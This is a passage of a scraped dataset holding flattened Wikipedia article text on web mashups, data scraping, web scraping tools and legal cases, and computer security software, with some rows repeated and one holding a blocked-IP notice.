data on portals and updated them regularly. They controlled all the consumer data, and the consumer had to use their products and services to get the information. citation needed The advent of Web 2.0 introduced Web standards that were commonly and widely adopted across traditional competitors and which unlocked the consumer data. At the same time, mashups emerged, allowing mixing and matching competitors' APIs to develop new services. The first mashups used mapping services or photo services to combine these services with data of any kind and therefore to produce visualizations of data. 4 failed verification In the beginning, most mashups were consumer-based, but recently when? the mashup is to be seen by whom? as an interesting concept useful also to enterprises. Business mashups can combine existing internal data with external services to generate new views on the data. There was also the free Yahoo Pipes to build mashups for free using the Yahoo Query Language. There are many types of mashup, such as business mashups, consumer mashups, and data mashups. 5 The most common type of mashup is the consumer mashup, aimed at the general public. Mashups can also be categorized by the basic API type they use but any of these can be combined with each other or embedded into other applications. In technology, a mashup enabler is a tool for transforming incompatible IT resources into a form that allows them to be easily combined, in order to create a mashup. Mashup enablers allow powerful techniques and tools (such as mashup platforms) for combining data and services to be applied to new kinds of resources. An example of a mashup enabler is a tool for creating an RSS feed from a spreadsheet (which cannot easily be used to create a mashup). Many mashup editors include mashup enablers, for example, Presto Mashup Connectors, Convertigo Web Integrator or Caspio Bridge. Mashup enablers have also been described as "the service and tool providers, sic that make mashups possible". citation needed Early mashups were developed manually by enthusiastic programmers. However, as mashups became more popular, companies began creating platforms for building mashups, which allow designers to visually construct mashups by connecting together mashup components. Mashup editors have greatly simplified the creation of mashups, significantly increasing the productivity of mashup developers and even opening mashup development to end-users and non-IT experts. Standard components and connectors enable designers to combine mashup resources in all sorts of complex ways with ease. Mashup platforms, however, have done little to broaden the scope of resources accessible by mashups and have not freed mashups from their reliance on well-structured data and open libraries (RSS feeds and public APIs). Mashup enablers evolved to address this problem, providing the ability to convert other kinds of data and services into mashable resources. Of course, not all valuable data is located within organizations. In fact, the most valuable information for business intelligence and decision support is often external to the organization. With the emergence of rich web applications and online Web portals, a wide range of business-critical processes (such as ordering) are becoming available online. Unfortunately, very few of these data sources syndicate content in RSS format and very few of these services provide publicly accessible APIs. Mashup editors therefore solve this problem by providing enablers or connectors. Mashups and portals are both content aggregation technologies. Portals are an older technology designed as an extension to traditional dynamic Web applications, in which the process of converting data content into marked-up Web pages is split into two phases: generation of markup "fragments" and aggregation of the fragments into pages. Each markup fragment is generated by a "portlet", and the portal combines them into a single Web page. Portlets may be hosted locally on the portal server or remotely on a separate server. Portal technology defines a complete event model covering reads and updates. A request for an aggregate page on a portal is translated into individual read operations on all the portlets that form the page ("render" operations on local, JSR 168 portlets or "getMarkup" operations on remote, WSRP portlets). If a submit button is pressed on any portlet on a portal page, it is translated into an update operation on that portlet alone (processAction on a local portlet or performBlockingInteraction on a remote, WSRP portlet). The update is then immediately followed by a read on all portlets on the page. Portal technology is about server-side, presentation-tier aggregation. It cannot be used to drive more robust forms of application integration such as two-phase commit. Mashups differ from portals in the following respects: The portal model has been around longer and has had greater investment and product research. Portal technology is therefore more standardized and mature. Over time, increasing maturity and standardization of mashup technology will likely make it more popular than portal technology because it is more closely associated with Web 2.0 and lately Service-oriented Architectures (SOA). 7 New versions of portal products are expected to eventually add mashup support while still supporting legacy portlet applications. Mashup technologies, in contrast, are not expected to provide support for portal standards. Mashup uses are expanding in the business environment. Business mashups are useful for integrating business and data services, as business mashups technologies provide the ability to develop new integrated services quickly, to combine internal services with external or personalized information, and to make these services tangible to the business user through user-friendly Web browser interfaces. 8 Business mashups differ from consumer mashups in the level of integration with business computing environments, security and access control features, governance, and the sophistication of the programming tools (mashup editors) used. Another difference between business mashups and consumer mashups is a growing trend of using business mashups in commercial software as a service (SaaS) offering. Many of the providers of business mashups technologies have added SOA features. The architecture of a mashup is divided into three layers: Architecturally, there are two styles of mashups: Web-based and server-based. Whereas Web-based mashups typically use the user's web browser to combine and reformat the data, server-based mashups analyze and reformat the data on a remote server and transmit the data to the user's browser in its final form. 9 Mashups appear to be a variation of a fa ade pattern. 10 That is: a software engineering design pattern that provides a simplified interface to a larger body of code (in this case the code to aggregate the different feeds with different APIs). Mashups can be used with software provided as a service (SaaS). After several years of standards development, mainstream businesses are starting to adopt service-oriented architectures (SOA) to integrate disparate data by making them available as discrete Web services. Web services provide open, standardized protocols to provide a unified means of accessing information from a diverse set of platforms (operating systems, programming languages, applications). These Web services can be reused to provide completely new services and applications within and across organizations, providing business flexibility. |
469 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:MyContributions | This IP address is currently blocked. The latest block log entry is provided below for reference: This user or IP address is currently globally blocked. If the block is marked as locally disabled, this means that it applies on other sites, but a local administrator has decided to disable it on this wiki. The global block log entry is provided below for reference: No changes were found matching these criteria. |
470 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-1 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
471 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_note-3 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
472 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Computer_security_software | Computer security software or cybersecurity software is any computer program designed to influence information security. This is often taken in the context of defending computer systems or data, yet can incorporate programs designed specifically for subverting computer systems due to their significant overlap, and the adage that the best defense is a good offense. The defense of computers against intrusion and unauthorized use of resources is called computer security. Similarly, the defense of computer networks is called network security. The subversion of computers or their unauthorized use is referred to using the terms cyberwarfare, cybercrime, or security hacking (later shortened to hacking for further references in this article due to issues with hacker, hacker culture and differences in white grey black 'hat' color identification). The computer security software products industry was launched in the second half of the 1970s when computer firms and new IT startups chose alternative paths to offer commercial access control systems to organizational mainframe computer users. These developments were led by IBM's Resource Access Control Facility and SKK's Access Control Facility 2. 1 Below, various software implementations of Cybersecurity patterns and groups outlining ways a host system attempts to secure itself and its assets from malicious interactions, this includes tools to deter both passive and active security threats. Although both security and usability are desired, today it is widely considered in computer security software that with higher security comes decreased usability, and with higher usability comes decreased security. 2 The primary purpose of these types of systems is to restrict and often to completely prevent access to computers or data except to a very limited set of users. The theory is often that if a key, credential, or token is unavailable then access should be impossible. This often involves taking valuable information and then either reducing it to apparent noise or hiding it within another source of information in such a way that it is unrecoverable. A critical tool used in developing software that prevents malicious access is Threat Modeling. 3 Threat modeling is the process of creating and applying mock situations where an attacker could be trying to maliciously access data in cyberspace. By doing this, various profiles of potential attackers are created, including their intentions, and a catalog of potential vulnerabilities are created for the respective organization to fix before a real threat arises. 4 Threat modeling covers a wide aspect of cyberspace, including devices, applications, systems, networks, or enterprises. Cyber threat modeling can inform organizations with their efforts pertaining to cybersecurity in the following ways: 5 The purpose of these types of systems is usually to restrict access to computers or data while still allowing interaction. Often this involves monitoring or checking credential, separating systems from access and view based on importance, and quarantining or isolating perceived dangers. A physical comparison is often made to a shield. A form of protection whose use is heavily dependent on the system owners preferences and perceived threats. Large numbers of users may be allowed relatively low-level access with limited security checks, yet significant opposition will then be applied toward users attempting to move toward critical areas. The purpose of these types of software systems is to monitor access to computers systems and data while reporting or logging the behavior. Often this is composed of large quantities of low priority data records logs, coupled with high priority notices for unusual or suspicious behavior. These programs use algorithms either stolen from, or provided by, the police and military internet observation organizations to provide the equivalent of a police Radio scanner. Most of these systems are born out of mass surveillance concepts for internet traffic, cell phone communication, and physical systems like CCTV. In a global perspective they are related to the fields of SIGINT and ELINT and approach GEOINT in the global information monitoring perspective. Several instant messaging programs such as ICQ (founded by "former" members of Unit 8200), or WeChat and QQ (rumored 3PLA 4PLA connections 6 7 ) may represent extensions of these observation apparati. The purpose of these types of software is to remove malicious or harmful forms of software that may compromise the security of a computer system. These types of software are often closely linked with software for computer regulation and monitoring. A physical comparison to a doctor, scrubbing, or cleaning ideas is often made, usually with an "anti style naming scheme related to a particular threat type. Threats and unusual behavior are identified by a system such as a firewall or an intrusion detection system, and then the following types of software are used to remove them. These types of software often require extensive research into their potential foes to achieve complete success, similar to the way that complete eradication of bacteria or viral threats does in the physical world. Occasionally this also represents defeating an attackers encryption, such as in the case of data tracing, or hardened threat removal. |
473 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-1 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to 